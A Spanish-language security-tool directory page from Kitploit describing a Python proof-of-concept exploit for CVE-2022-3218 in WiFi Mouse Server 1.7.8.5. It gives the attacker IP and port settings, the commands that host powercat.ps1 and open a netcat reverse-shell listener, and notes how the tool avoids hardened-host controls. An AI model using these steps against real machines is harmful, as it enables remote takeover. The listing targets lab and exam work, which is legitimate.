Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
MouseServer-1.7.8.5-RCE — Exploit PoC para CVE-2022-3218 dirigido a WiFi Mouse Server 1.7.8.5, que logra RCE mediante inyección de teclado y entrega de payload de PowerShell en memoria para laboratorios endurecidos. | Kitploit
Herramientas/GitHubGitHub/mermehr/mouseserver-1.7.8.5-rce
Análisis de VulnerabilidadesExplotaciónPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubmermehr/mouseserver-1.7.8.5-rce

MouseServer-1.7.8.5-RCE

Exploit PoC para CVE-2022-3218 dirigido a WiFi Mouse Server 1.7.8.5, que logra RCE mediante inyección de teclado y entrega de payload de PowerShell en memoria para laboratorios endurecidos.

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
hace 5 díasAún no revisado

WiFi Mouse Server 1.7.8.5 - RCE

Un exploit optimizado de Prueba de Concepto (PoC) en Python 3 para WiFi Mouse Server v1.7.8.5. Este script aprovecha una vulnerabilidad inherente del protocolo para lograr la Ejecución Remota de Código (RCE) mediante la inyección automatizada de pulsaciones de teclado.

Esta versión ha sido explícitamente modificada y ajustada para entornos de laboratorio donde los exploits públicos tradicionales fallan debido a restricciones de endurecimiento del host (como la ejecución restringida de certutil.exe o el bloqueo de descargas de binarios).

Contexto y Atribuciones

  • Históricamente seguido junto a hallazgos de la comunidad como CVE-2022-3218.
  • Fuertemente inspirado y adaptado del exploit público original de RedHatAugust, Exploit-DB #49601.
  • El script original de Exploit-DB depende de cmd.exe y certutil.exe para colocar un ejecutable malicioso en disco. En estructuras de laboratorio/examen endurecidas o modernas, estos LOLBins suelen estar restringidos o bloqueados por directivas de grupo locales. Esta versión modificada traslada el vector completamente a memoria mediante una cuna web de PowerShell usando powercat.ps1.

Uso

Configura tu Payload (Dentro del Script)

Abre el script y actualiza las variables de configuración al inicio del archivo con los ajustes de tu entorno local:

root@kitploit:~
rhost = sys.argv[1]
lhost = "192.168.45.167"  # Your Attacker/Kali IP
lport = "443"             # Your Netcat Listener Port
http_port = "80"          # Your local HTTP Server Port hosting powercat

Configurar los Listeners del Host

Hospeda powercat.ps1 en tu máquina atacante local dentro de un directorio:

root@kitploit:~
python3 -m http.server 80

En una pestaña de terminal separada, establece tu listener de reverse shell en el lport configurado:

root@kitploit:~
nc -lvnp 443

Ejecutar el Exploit

Ejecuta el script contra la dirección IP de la máquina objetivo:

root@kitploit:~
python3 exploit.py <TARGET-IP>
Descargar herramienta